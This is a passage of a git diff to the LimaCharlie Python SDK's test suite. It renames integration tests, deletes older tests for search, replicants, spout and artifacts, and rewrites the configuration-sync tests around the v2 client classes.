similarity index 100%
rename from tests/integration/test_v2_replay.py
rename to tests/integration/test_replay.py
diff --git a/tests/integration/test_replicants.py b/tests/integration/test_replicants.py
deleted file mode 100644
index 3abcdfc2..00000000
--- a/tests/integration/test_replicants.py
+++ /dev/null
@@ -1,19 +0,0 @@
-import limacharlie
-
-def test_credentials( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    assert( lc.testAuth( [
-        'org.get',
-        'sensor.get',
-        'sensor.list',
-        'replicant.get',
-        'replicant.task',
-    ] ) )
-
-def test_replicants_available( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    replicants = list( lc.getAvailableReplicants() )
-
-    assert( 0 != len( replicants ) )
\ No newline at end of file
diff --git a/tests/integration/test_v2_rules.py b/tests/integration/test_rules.py
similarity index 100%
rename from tests/integration/test_v2_rules.py
rename to tests/integration/test_rules.py
diff --git a/tests/integration/test_v2_search.py b/tests/integration/test_search.py
similarity index 100%
rename from tests/integration/test_v2_search.py
rename to tests/integration/test_search.py
diff --git a/tests/integration/test_search_api_integration.py b/tests/integration/test_search_api_integration.py
deleted file mode 100644
index ee5d5fb6..00000000
--- a/tests/integration/test_search_api_integration.py
+++ /dev/null
@@ -1,703 +0,0 @@
-"""
-Integration tests for the Search API.
-
-These tests verify end-to-end functionality of the Search API,
-including real API interactions with the LimaCharlie cloud.
-
-Note: These tests require valid LC credentials passed via --oid and --key CLI options.
-"""
-
-import limacharlie
-import time
-import subprocess
-import sys
-import os
-import tempfile
-
-
-def test_credentials_search(oid, key):
-    """
-    Test that credentials have the required permissions for Search API.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    lc = limacharlie.Manager(oid, key)
-
-    # Search API requires specific permissions
-    assert lc.testAuth([
-        'org.get',
-        'insight.evt.get',
-    ])
-
-
-def test_validate_simple_query(oid, key):
-    """
-    Test validating a simple search query returns expected structure.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    lc = limacharlie.Manager(oid, key)
-
-    # Use a short time range to minimize cost
-    end_time = int(time.time())
-    start_time = end_time - 60  # 1 minute
-
-    # Query format: <sensor_selector> | <event_filter> | <projection>
-    query = "* | NEW_PROCESS | *"
-
-    result = lc.validateSearch(query, start_time, end_time)
-
-    # Should have expected keys
-    assert 'query' in result
-    assert 'estimatedPrice' in result
-
-    # Should not have an error
-    assert result.get('error') is None
-
-    # Price should be reasonable for 1 minute
-    price = result['estimatedPrice']['value']
-    assert price >= 0
-    assert price < 10  # Sanity check - should be cheap for 1 minute
-
-
-def test_validate_invalid_query(oid, key):
-    """
-    Test that validating an invalid query returns an error.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    lc = limacharlie.Manager(oid, key)
-
-    end_time = int(time.time())
-    start_time = end_time - 60
-
-    # Invalid query syntax
-    query = "invalid query syntax here $$#"
-
-    result = lc.validateSearch(query, start_time, end_time)
-
-    # Should have an error
-    assert result.get('error') is not None
-
-
-def test_validate_with_stream(oid, key):
-    """
-    Test validation with different stream parameters.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    lc = limacharlie.Manager(oid, key)
-
-    end_time = int(time.time())
-    start_time = end_time - 60
-
-    # Test each stream type
-    # Query format: <sensor_selector> | <event_filter> | <projection>
-    # Valid stream values: event, detection, audit
-    streams = ['event', 'detection', 'audit']
-
-    for stream in streams:
-        result = lc.validateSearch(
-            "* | * | *",
-            start_time,
-            end_time,
-            stream=stream
-        )
-
-        # Should succeed (no error)
-        assert result.get('error') is None, f"Failed for stream: {stream}"
-
-
-def test_initiate_and_cancel_search(oid, key):
-    """
-    Test initiating a search and then canceling it.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    lc = limacharlie.Manager(oid, key)
-
-    # Use a longer time range that will take time to execute
-    end_time = int(time.time())
-    start_time = end_time - 3600  # 1 hour
-
-    # Query format: <sensor_selector> | <event_filter> | <projection>
-    query = "* | * | *"
-
-    # Initiate the search
-    init_response = lc.initiateSearch(query, start_time, end_time, paginated=True)
-
-    # Should have a query ID
-    assert 'queryId' in init_response
-    query_id = init_response['queryId']
-    assert query_id is not None
-    assert len(query_id) > 0
-
-    # Cancel the search
-    cancel_response = lc.cancelSearch(query_id)
-
-    # Cancel should succeed (or already be done)
-    # The response structure may vary, but shouldn't raise an exception
-    assert cancel_response is not None
-
-
-def test_execute_simple_search(oid, key):
-    """
-    Test executing a simple search and receiving results.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    lc = limacharlie.Manager(oid, key)
-
-    # Very short time range to minimize cost and execution time
-    end_time = int(time.time())
-    start_time = end_time - 60  # 1 minute
-
-    # Query format: <sensor_selector> | <event_filter> | <projection>
-    query = "* | NEW_PROCESS | *"
-
-    results = []
-    result_count = 0
-
-    # Execute search and collect results
-    for result in lc.executeSearch(
-        query,
-        start_time,
-        end_time,
-        max_poll_attempts=100,  # Limit poll attempts for test
-        poll_interval=1
-    ):
-        results.append(result)
-        result_count += 1
-
-        # Limit results for testing to avoid long test times
-        if result_count >= 10:
-            break
-
-    # Should complete without error
-    # Result count might be 0 if no events match (both are valid)
-    assert result_count >= 0
-
-    # If we got results, verify they have expected structure
-    if results:
-        for result in results:
-            assert isinstance(result, dict)
-            # Results should have a type field
-            assert 'type' in result
-
-
-def test_execute_search_with_callbacks(oid, key):
-    """
-    Test that callbacks are invoked during search execution.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    lc = limacharlie.Manager(oid, key)
-
-    end_time = int(time.time())
-    start_time = end_time - 60
-
-    # Query format: <sensor_selector> | <event_filter> | <projection>
-    query = "* | NEW_PROCESS | *"
-
-    # Track callback invocations
-    callback_data = {
-        'progress_called': 0,
-        'query_initiated_called': False,
-        'query_id': None
-    }
-
-    def progress_callback():
-        callback_data['progress_called'] += 1
-
-    def on_query_initiated(query_id):
-        callback_data['query_initiated_called'] = True
-        callback_data['query_id'] = query_id
-
-    result_count = 0
-    for result in lc.executeSearch(
-        query,
-        start_time,
-        end_time,
-        max_poll_attempts=50,
-        poll_interval=1,
-        progress_callback=progress_callback,
-        on_query_initiated=on_query_initiated
-    ):
-        result_count += 1
-        # Limit for testing
-        if result_count >= 5:
-            break
-
-    # Query initiated callback should have been called
-    assert callback_data['query_initiated_called'] is True
-    assert callback_data['query_id'] is not None
-
-    # Progress callback may have been called (depends on how fast the query completes)
-    # We can't strictly assert it was called since quick queries might complete immediately
-    assert callback_data['progress_called'] >= 0
-
-
-def test_execute_search_different_streams(oid, key):
-    """
-    Test executing searches on different stream types.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    lc = limacharlie.Manager(oid, key)
-
-    end_time = int(time.time())
-    start_time = end_time - 60
-
-    # Query format: <sensor_selector> | <event_filter> | <projection>
-    # Valid stream values: event, detection, audit
-    streams_to_test = {
-        'event': '* | * | *',
-        'detection': '* | * | *',
-        'audit': '* | * | *'
-    }
-
-    for stream, query in streams_to_test.items():
-        result_count = 0
-
-        # Execute search should not raise exception
-        for result in lc.executeSearch(
-            query,
-            start_time,
-            end_time,
-            stream=stream,
-            max_poll_attempts=30,
-            poll_interval=1
-        ):
-            result_count += 1
-            # Limit results
-            if result_count >= 3:
-                break
-
-        # Should complete without error (result count may be 0)
-        assert result_count >= 0
-
-
-def test_poll_search_results_pagination(oid, key):
-    """
-    Test manual pagination through poll search results.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    lc = limacharlie.Manager(oid, key)
-
-    # Slightly longer range to increase chance of getting results
-    end_time = int(time.time())
-    start_time = end_time - 300  # 5 minutes
-
-    # Query format: <sensor_selector> | <event_filter> | <projection>
-    query = "* | * | *"
-
-    # Initiate the search with pagination enabled
-    init_response = lc.initiateSearch(query, start_time, end_time, paginated=True)
-    query_id = init_response['queryId']
-
-    results = []
-    page_count = 0
-    last_token = None
-
-    # Poll for results with manual pagination
-    while page_count < 3:  # Limit to 3 pages for testing
-        poll_response = lc.pollSearchResults(
-            query_id,
-            token=last_token,
-            max_attempts=60,
-            poll_interval=1
-        )
-
-        if poll_response.get('error'):
-            # Error occurred - could be timeout or other issue
-            break
-
-        if poll_response.get('results'):
-            results.extend(poll_response['results'])
-
-        last_token = poll_response.get('nextToken')
-        page_count += 1
-
-        # No more pages available
-        if not last_token:
-            break
-
-    # Should have completed at least one page
-    assert page_count >= 1
-
-
-def test_cli_validate_command(oid, key):
-    """
-    Test the CLI validate command via subprocess.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    # Set up environment with credentials
-    env = os.environ.copy()
-    env['LC_OID'] = oid
-    env['LC_API_KEY'] = key
-
-    # Run the CLI command
-    result = subprocess.run(
-        [
-            sys.executable, '-m', 'limacharlie',
-            '--oid', oid,
-            'search', 'validate',
-            '--query', '* | NEW_PROCESS | *',
-        ],
-        capture_output=True,
-        text=True,
-        env=env,
-        timeout=60
-    )
-
-    # Should succeed
-    assert result.returncode == 0, (
-        f"CLI exited {result.returncode}.\nstdout: {result.stdout}\nstderr: {result.stderr}"
-    )
-
-
-def test_cli_execute_command(oid, key):
-    """
-    Test the CLI run command via subprocess.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    # Set up environment with credentials
-    env = os.environ.copy()
-    env['LC_OID'] = oid
-    env['LC_API_KEY'] = key
-
-    now = int(time.time())
-    start = now - 60
-
-    # Run the CLI command
-    result = subprocess.run(
-        [
-            sys.executable, '-m', 'limacharlie',
-            '--oid', oid,
-            'search', 'run',
-            '--query', '* | NEW_PROCESS | *',
-            '--start', str(start),
-            '--end', str(now),
-            '--limit', '5',
-        ],
-        capture_output=True,
-        text=True,
-        env=env,
-        timeout=120  # 2 minute timeout
-    )
-
-    # Should succeed (even with no results)
-    assert result.returncode == 0, (
-        f"CLI exited {result.returncode}.\nstdout: {result.stdout}\nstderr: {result.stderr}"
-    )
-
-
-def test_cli_execute_csv_output(oid, key):
-    """
-    Test the CLI estimate command via subprocess.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    # Set up environment with credentials
-    env = os.environ.copy()
-    env['LC_OID'] = oid
-    env['LC_API_KEY'] = key
-
-    now = int(time.time())
-    start = now - 60
-
-    # Run the CLI estimate command
-    result = subprocess.run(
-        [
-            sys.executable, '-m', 'limacharlie',
-            '--oid', oid,
-            'search', 'estimate',
-            '--query', '* | NEW_PROCESS | *',
-            '--start', str(start),
-            '--end', str(now),
-        ],
-        capture_output=True,
-        text=True,
-        env=env,
-        timeout=120
-    )
-
-    # Should succeed
-    assert result.returncode == 0, (
-        f"CLI exited {result.returncode}.\nstdout: {result.stdout}\nstderr: {result.stderr}"
-    )
-
-
-def test_cli_execute_with_stream(oid, key):
-    """
-    Test the CLI run command with stream parameter.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    # Set up environment with credentials
-    env = os.environ.copy()
-    env['LC_OID'] = oid
-    env['LC_API_KEY'] = key
-
-    now = int(time.time())
-    start = now - 60
-
-    # Run the CLI command with stream parameter
-    result = subprocess.run(
-        [
-            sys.executable, '-m', 'limacharlie',
-            '--oid', oid,
-            'search', 'run',
-            '--query', '* | * | *',
-            '--start', str(start),
-            '--end', str(now),
-            '--stream', 'audit',
-        ],
-        capture_output=True,
-        text=True,
-        env=env,
-        timeout=120
-    )
-
-    # Should succeed (even with no results)
-    assert result.returncode == 0, (
-        f"CLI exited {result.returncode}.\nstdout: {result.stdout}\nstderr: {result.stderr}"
-    )
-
-
-def test_cli_validate_time_formats(oid, key):
-    """
-    Test CLI validate command with various time format inputs.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    # Set up environment with credentials
-    env = os.environ.copy()
-    env['LC_OID'] = oid
-    env['LC_API_KEY'] = key
-
-    # Test with a simple query
-    result = subprocess.run(
-        [
-            sys.executable, '-m', 'limacharlie',
-            '--oid', oid,
-            'search', 'validate',
-            '--query', '* | NEW_PROCESS | *',
-        ],
-        capture_output=True,
-        text=True,
-        env=env,
-        timeout=60
-    )
-    assert result.returncode == 0, (
-        f"CLI exited {result.returncode}.\nstdout: {result.stdout}\nstderr: {result.stderr}"
-    )
-
-    # Test with a different query
-    result = subprocess.run(
-        [
-            sys.executable, '-m', 'limacharlie',
-            '--oid', oid,
-            'search', 'validate',
-            '--query', '* | * | *',
-        ],
-        capture_output=True,
-        text=True,
-        env=env,
-        timeout=60
-    )
-    assert result.returncode == 0, (
-        f"CLI exited {result.returncode}.\nstdout: {result.stdout}\nstderr: {result.stderr}"
-    )
-
-
-def test_search_result_structure(oid, key):
-    """
-    Test that search results have the expected structure with metadata.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    lc = limacharlie.Manager(oid, key)
-
-    end_time = int(time.time())
-    start_time = end_time - 60
-
-    # Query format: <sensor_selector> | <event_filter> | <projection>
-    query = "* | * | *"
-
-    results = []
-    for result in lc.executeSearch(
-        query,
-        start_time,
-        end_time,
-        max_poll_attempts=60,
-        poll_interval=1
-    ):
-        results.append(result)
-        # Get at least a few results to verify structure
-        if len(results) >= 3:
-            break
-
-    # If we got results, verify they have expected metadata
-    for result in results:
-        # Each result should be a dict with type
-        assert isinstance(result, dict)
-        assert 'type' in result
-
-        # Type should be one of the expected values
-        assert result['type'] in ['events', 'facets', 'timeline']
-
-        # Should have page number metadata
-        assert '_page_number' in result
-
-
-def test_execute_search_resume_functionality(oid, key):
-    """
-    Test that search can be resumed with query_id and resume_token.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    lc = limacharlie.Manager(oid, key)
-
-    end_time = int(time.time())
-    start_time = end_time - 300  # 5 minutes for more results
-
-    # Query format: <sensor_selector> | <event_filter> | <projection>
-    query = "* | * | *"
-
-    # First, initiate the search and get the query ID
-    init_response = lc.initiateSearch(query, start_time, end_time, paginated=True)
-    query_id = init_response['queryId']
-
-    # Get first page of results
-    first_page = lc.pollSearchResults(
-        query_id,
-        max_attempts=60,
-        poll_interval=1
-    )
-
-    next_token = first_page.get('nextToken')
-
-    # If there's a next token, we can test resume
-    if next_token:
-        # Resume from the next token using executeSearch
-        resumed_results = []
-        for result in lc.executeSearch(
-            query,
-            start_time,
-            end_time,
-            query_id=query_id,
-            resume_token=next_token,
-            max_poll_attempts=30,
-            poll_interval=1
-        ):
-            resumed_results.append(result)
-            if len(resumed_results) >= 3:
-                break
-
-        # Should be able to get results from resumed search
-        assert len(resumed_results) >= 0
-
-
-def test_org_urls_includes_search(oid, key):
-    """
-    Test that org URLs endpoint returns the search URL.
-
-    Parameters:
-        oid (str): The organization ID.
-        key (str): The API key.
-
-    Return:
-        None
-    """
-    lc = limacharlie.Manager(oid, key)
-
-    urls = lc.getOrgURLs()
-
-    # Should have search URL
-    assert 'search' in urls
-    assert urls['search'] is not None
-    assert len(urls['search']) > 0
diff --git a/tests/integration/test_v2_sensors.py b/tests/integration/test_sensors.py
similarity index 100%
rename from tests/integration/test_v2_sensors.py
rename to tests/integration/test_sensors.py
diff --git a/tests/integration/test_spout.py b/tests/integration/test_spout.py
deleted file mode 100644
index 8e574aeb..00000000
--- a/tests/integration/test_spout.py
+++ /dev/null
@@ -1,44 +0,0 @@
-import limacharlie
-
-def test_credentials( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    assert( lc.testAuth( [
-        'org.get',
-        'sensor.list',
-        'sensor.get',
-        'output.list',
-        'output.set',
-        'output.del',
-    ] ) )
-
-def test_spout( oid, key ):
-    lc = limacharlie.Manager( oid, key, inv_id = 'test-lc-python-sdk-inv', is_interactive = True )
-
-    try:
-        # First we need to make sure we have a sensor to test against.
-        sensors = list( lc.sensors() )
-        assert( 0 != len( sensors ) )
-
-        # We will pick the first sensor in the list that is online.
-        targetSensor = None
-        for sensor in sensors:
-            if ( not sensor.isChrome() ) and sensor.isOnline():
-                targetSensor = sensor
-                print( "Found sensor %s online, using it for test." % ( sensor, ) )
-                break
-
-        assert( targetSensor is not None )
-
-        resp = targetSensor.simpleRequest( 'os_version' )
-
-        assert( resp is not None )
-        assert( resp.get( 'event', None ) is not None )
-    finally:
-        try:
-            lc.shutdown()
-        except:
-            # In Python3 the underlying http client has issues
-            # with this call being reentrant. It should not be
-            # an issue for us here.
-            pass
\ No newline at end of file
diff --git a/tests/integration/test_v2_stream.py b/tests/integration/test_stream.py
similarity index 100%
rename from tests/integration/test_v2_stream.py
rename to tests/integration/test_stream.py
diff --git a/tests/integration/test_sync.py b/tests/integration/test_sync.py
index 1d8aae4c..8184fb4c 100644
--- a/tests/integration/test_sync.py
+++ b/tests/integration/test_sync.py
@@ -1,168 +1,60 @@
-import limacharlie
-import json
-import string
-import random
-
-def test_sensors( oid, key ):
-    sync = limacharlie.Configs( manager = limacharlie.Manager( oid, key ) )
-
-    for change, dataType, elem in sync.push( {}, isForce = True, isRules = True ):
-        pass
-
-    allConfigs = {}
-    sync.fetch( allConfigs, isRules = True, isResources = True )
-
-    assert( allConfigs )
-    assert( 0 != len( allConfigs ) )
-
-    newConfigs = {
-        'rules' : {
-            'test-sync-rule' : {
-                'detect' : {
-                    'op' : 'is tagged',
-                    'tag' : 'test-tag-python-sync',
-                    'event' : 'NEW_PROCESS',
-                },
-                'respond' : [ {
-                    'action' : 'report',
-                    'name' : 'test-sync-detection',
-                } ]
-            }
-        }
-    }
-
-    for change, dataType, elem in sync.push( newConfigs, isRules = True ):
-        assert( '+' == change )
-        assert( 'dr-rule' == dataType )
-        assert( 'test-sync-rule' == elem )
-
-    allConfigs = {}
-    sync.fetch( allConfigs, isRules = True, isResources = True )
-
-    assert( 'test-sync-rule' in allConfigs.get( 'rules', {} ) )
-
-    newConfigs[ 'rules' ][ 'second' ] = {
-        'detect' : {
-            'op' : 'is tagged',
-            'tag' : 'test-tag-python-sync',
-            'event' : 'NEW_PROCESS',
-        },
-        'respond' : [ {
-            'action' : 'report',
-            'name' : 'test-sync2-detection',
-        } ]
-    }
-
-    for change, dataType, elem in sync.push( newConfigs, isRules = True ):
-        if '=' == change:
-            assert( '=' == change )
-            assert( 'dr-rule' == dataType )
-            assert( 'test-sync-rule' == elem )
-        else:
-            assert( '+' == change )
-            assert( 'dr-rule' == dataType )
-            assert( 'second' == elem )
-
-    newConfigs[ 'rules' ].pop( 'second', None )
-
-    for change, dataType, elem in sync.push( newConfigs, isForce = True, isRules = True ):
-        if '=' == change:
-            assert( '=' == change )
-            assert( 'dr-rule' == dataType )
-            assert( 'test-sync-rule' == elem )
-        else:
-            assert( '-' == change )
-            assert( 'dr-rule' == dataType )
-            assert( 'second' == elem )
-
-    for change, dataType, elem in sync.push( {}, isForce = True, isRules = True ):
-        assert( '-' == change )
-        assert( 'dr-rule' == dataType )
-        assert( 'test-sync-rule' == elem )
-
-    allConfigs = {}
-    sync.fetch( allConfigs, isRules = True )
-
-    assert( allConfigs )
-    assert( 0 == len( allConfigs.get( 'rules', {} ) ) )
-
-
-def test_hive(oid, key):
-    sync = limacharlie.Configs( manager = limacharlie.Manager( oid, key ) )
-    letters = string.ascii_lowercase
-    unique_key = 'test-s3-python-sdk-' + ''.join(random.choice(letters) for i in range(6))
-    newConfigs = {
-        "hives":{
-            "cloud_sensor": {
-                unique_key: {
-                    "data": {
-                        "s3": {
-                        "access_key": "test-access-key",
-                        "bucket_name": "aws-cloudtrail-logs-005407990505-225b8680",
-                        "client_options": {
-                            "hostname": "cloudtrail",
-                            "identity": {
-                            "installation_key": "test-install-key",
-                            "oid": "342c7b8f-243a-4acb-8801-d82f3f8dca99"
-                            },
-                            "platform": "aws",
-                            "sensor_seed_key": "cloudtrail"
-                        },
-                        "secret_key": "secret-key"
-                        },
-                        "sensor_type": "s3"
-                    },
-                    "usr_mtd": {
-                        "enabled": False,
-                        "expiry": 0,
-                    }
-                }
-            }
-        }
-    }
-
-    #dry run of adding cloud_sensor
-    for change, dataType, elem in sync.push(newConfigs,isDryRun=True, isHives={"cloud_sensor":True}):
-        assert(change == "+")
-        assert(dataType == "hives")
-        assert(elem == "cloud_sensor/"+unique_key)
-
-    #actual run of adding cloud_sensor
-    for change, dataType, elem in sync.push(newConfigs,isDryRun=False, isHives={"cloud_sensor":True}):
-        assert(change == "+")
-        assert(dataType == "hives")
-        assert(elem == "cloud_sensor/"+unique_key)
-
-
-    # run sync fetch to ensure cloud_sensor data can be retrieved and is created
-    sensor_configs = {}
-    sync.fetch( sensor_configs, isHives={"cloud_sensor":True })
-    assert(unique_key in sensor_configs.get( 'hives', {} )['cloud_sensor'])
-
-
-    #remove newly created config data from sensor_configs as sync.push will auto delete any removed config data when sync push is ran
-    sensor_configs["hives"]["cloud_sensor"].pop(unique_key, None)
-
-
-    #dry run test to ensure unique key is removed, isForce will remove any hive data not part of sensor_config so be weary of removing values from original sensor config 
-    # isHives={} can set any key to true and push will run config updates based upon passed sensor_config data and not hive keys
-    for change, dataType, elem in sync.push(sensor_configs,isDryRun=True, isForce=True, isHives={"cloud_sensor":True}):
-        assert(change == "-")
-        assert(dataType == "hives")
-        assert(elem == "cloud_sensor/"+unique_key)
-
-
-    # actual run of sync push and removal of newly created cloud_sensor data
-    for change, dataType, elem in sync.push(sensor_configs,isDryRun=False, isForce=True, isHives={"cloud_sensor":True}):
-        assert(change == "-")
-        assert(dataType == "hives")
-        assert(elem == "cloud_sensor/"+unique_key)
-
-
-        
-    # grab actual data after delete to ensure it has been deleted
-    sync.fetch( sensor_configs, isHives={"cloud_sensor":True})
-
-    # assert that cloud_sensor no longer contains created cloud_sensor data
-    assert(unique_key not in sensor_configs.get( 'hives', {} )['cloud_sensor'])
-
+"""Integration tests for LimaCharlie v2 SDK configuration sync (IaC).
+
+Uses the ext-infrastructure extension for all operations.
+"""
+
+import sys
+import os
+
+sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "../../")))
+
+from limacharlie.client import Client
+from limacharlie.sdk.organization import Organization
+from limacharlie.sdk.configs import Configs
+
+TEST_PREFIX = "test-cli-v2-"
+
+
+def test_v2_sync_fetch_outputs(oid, key):
+    """Fetch outputs config via ext-infrastructure and verify it returns a dict."""
+    client = Client(oid=oid, api_key=key)
+    org = Organization(client)
+    configs = Configs(org)
+
+    result = configs.fetch(sync_outputs=True)
+    assert isinstance(result, dict), (
+        f"Expected dict from configs.fetch(sync_outputs=True), "
+        f"got {type(result).__name__}"
+    )
+
+
+def test_v2_sync_fetch_hives(oid, key):
+    """Fetch D&R rules via hives and verify it returns a dict."""
+    client = Client(oid=oid, api_key=key)
+    org = Organization(client)
+    configs = Configs(org)
+
+    result = configs.fetch(sync_hives={"dr-general": True})
+    assert isinstance(result, dict), (
+        f"Expected dict from configs.fetch(sync_hives=...), "
+        f"got {type(result).__name__}"
+    )
+
+
+def test_v2_sync_push_dry_run(oid, key):
+    """Push an empty config with dry_run=True and verify no changes are made."""
+    client = Client(oid=oid, api_key=key)
+    org = Organization(client)
+    configs = Configs(org)
+
+    # Push a minimal valid config in dry-run mode -- should not modify anything.
+    empty_config = {"version": Configs.CONF_VERSION}
+    result = configs.push(
+        config=empty_config,
+        is_dry_run=True,
+        sync_outputs=True,
+    )
+    # push() returns a list of (op_type, resource_type, name) tuples.
+    assert isinstance(result, list), (
+        f"Expected list from configs.push(dry_run), got {type(result).__name__}"
+    )
diff --git a/tests/integration/test_v2_users.py b/tests/integration/test_users.py
similarity index 100%
rename from tests/integration/test_v2_users.py
rename to tests/integration/test_users.py
diff --git a/tests/integration/test_v2_usp.py b/tests/integration/test_usp.py
similarity index 100%
rename from tests/integration/test_v2_usp.py
rename to tests/integration/test_usp.py
diff --git a/tests/integration/test_v2_artifacts.py b/tests/integration/test_v2_artifacts.py
deleted file mode 100644
index e4f0d021..00000000
--- a/tests/integration/test_v2_artifacts.py
+++ /dev/null
@@ -1,85 +0,0 @@
-"""Integration tests for LimaCharlie v2 SDK artifacts."""
-
-import sys
-import os
-import uuid
-
-sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "../../")))
-
-from limacharlie.client import Client
-from limacharlie.sdk.organization import Organization
-from limacharlie.sdk.artifacts import Artifacts
-
-TEST_PREFIX = "test-cli-v2-"
-
-
-def test_v2_artifacts_list(oid, key):
-    """List artifacts and verify the call succeeds and returns a valid response."""
-    client = Client(oid=oid, api_key=key)
-    org = Organization(client)
-    artifacts = Artifacts(org)
-
-    result = artifacts.list()
-    # The response should be a dict (possibly with an 'artifacts' key) or a list.
-    assert isinstance(result, (dict, list)), (
-        f"Expected dict or list from artifacts.list(), got {type(result).__name__}"
-    )
-
-
-def test_v2_artifacts_upload_and_cleanup(oid, key):
-    """Upload a small artifact — requires LC_LOGS_TOKEN or ingestion key."""
-    client = Client(oid=oid, api_key=key)
-    org = Organization(client)
-
-    # Get an ingestion key to use as access_token for artifact upload.
-    ingestion_keys = org.get_ingestion_keys()
-    if not ingestion_keys:
-        # No ingestion keys available; create one for the test.
-        org.create_ingestion_key(TEST_PREFIX + "artifact-token")
-        ingestion_keys = org.get_ingestion_keys()
-
-    # Pick the first ingestion key's value.
-    # The API returns {name: key_uuid_string} (not {name: {"key": ...}}).
-    access_token = None
-    for ik_data in ingestion_keys.values():
-        if isinstance(ik_data, str) and ik_data:
-            access_token = ik_data
-            break
-        elif isinstance(ik_data, dict):
-            access_token = ik_data.get("key")
-            if access_token:
-                break
-
-    assert access_token is not None, (
-        f"Could not find an ingestion key to use as access_token. Keys: {ingestion_keys}"
-    )
-
-    artifacts = Artifacts(org, access_token=access_token)
-
-    tmp_path = os.path.join(
-        os.path.dirname(__file__),
-        f"{TEST_PREFIX}artifact-{uuid.uuid4().hex[:8]}.txt",
-    )
-
-    try:
-        with open(tmp_path, "w") as f:
-            f.write("integration test artifact content")
-
-        upload_resp = artifacts.upload(
-            tmp_path,
-            source=TEST_PREFIX + "source",
-            hint="txt",
-            retention_days=1,
-        )
-        assert upload_resp is not None, "Artifact upload returned None"
-
-        # Verify listing still succeeds after upload
-        result = artifacts.list()
-        assert isinstance(result, (dict, list)), (
-            f"Expected dict or list from artifacts.list() after upload, "
-            f"got {type(result).__name__}"
-        )
-    finally:
-        # Clean up the local temp file
-        if os.path.exists(tmp_path):
-            os.remove(tmp_path)
diff --git a/tests/integration/test_v2_sync.py b/tests/integration/test_v2_sync.py
deleted file mode 100644
index 8184fb4c..00000000
--- a/tests/integration/test_v2_sync.py
+++ /dev/null
@@ -1,60 +0,0 @@
-"""Integration tests for LimaCharlie v2 SDK configuration sync (IaC).
-
-Uses the ext-infrastructure extension for all operations.
-"""
-
-import sys
-import os
-
-sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "../../")))
-
-from limacharlie.client import Client
-from limacharlie.sdk.organization import Organization
-from limacharlie.sdk.configs import Configs
-
-TEST_PREFIX = "test-cli-v2-"
-
-
-def test_v2_sync_fetch_outputs(oid, key):
-    """Fetch outputs config via ext-infrastructure and verify it returns a dict."""
-    client = Client(oid=oid, api_key=key)
-    org = Organization(client)
-    configs = Configs(org)
-
-    result = configs.fetch(sync_outputs=True)
-    assert isinstance(result, dict), (
-        f"Expected dict from configs.fetch(sync_outputs=True), "
-        f"got {type(result).__name__}"
-    )
-
-
-def test_v2_sync_fetch_hives(oid, key):
-    """Fetch D&R rules via hives and verify it returns a dict."""
-    client = Client(oid=oid, api_key=key)
-    org = Organization(client)
-    configs = Configs(org)
-
-    result = configs.fetch(sync_hives={"dr-general": True})
-    assert isinstance(result, dict), (
-        f"Expected dict from configs.fetch(sync_hives=...), "
-        f"got {type(result).__name__}"
-    )
-
-
-def test_v2_sync_push_dry_run(oid, key):
-    """Push an empty config with dry_run=True and verify no changes are made."""
-    client = Client(oid=oid, api_key=key)
-    org = Organization(client)
-    configs = Configs(org)
-
-    # Push a minimal valid config in dry-run mode -- should not modify anything.
-    empty_config = {"version": Configs.CONF_VERSION}
-    result = configs.push(
-        config=empty_config,
-        is_dry_run=True,
-        sync_outputs=True,
-    )
-    # push() returns a list of (op_type, resource_type, name) tuples.
-    assert isinstance(result, list), (
-        f"Expected list from configs.push(dry_run), got {type(result).__name__}"
-    )
diff --git a/tests/integration/test_v2_yara.py b/tests/integration/test_yara.py
similarity index 100%
rename from tests/integration/test_v2_yara.py
rename to tests/integration/test_yara.py
diff --git a/tests/unit/test_configs.py b/tests/unit/test_configs.py
deleted file mode 100644
index 04ca89e0..00000000
--- a/tests/unit/test_configs.py
+++ /dev/null
@@ -1,187 +0,0 @@
-"""
-Unit tests for limacharlie.Configs module.
-
-Tests CLI argument parsing and hive configuration for the configs command.
-"""
-
-import io
-import sys
-from unittest import mock
-
-import pytest
-
-
-class TestConfigsCliExternalAdapterArg:
-    """Tests for --hive-external-adapter CLI argument in the configs command."""
-
-    def test_external_adapter_flag_recognized_in_help(self, capsys):
-        """Test that --hive-external-adapter appears in CLI help output."""
-        from limacharlie.Configs import main
-
-        with pytest.raises(SystemExit) as exc_info:
-            main(['--help'])
-
-        # argparse exits with 0 on --help
-        assert exc_info.value.code == 0
-
-        captured = capsys.readouterr()
-        assert '--hive-external-adapter' in captured.out
-        assert 'external adapters' in captured.out.lower()
-
-    def test_external_adapter_flag_sets_hive_in_fetch(self):
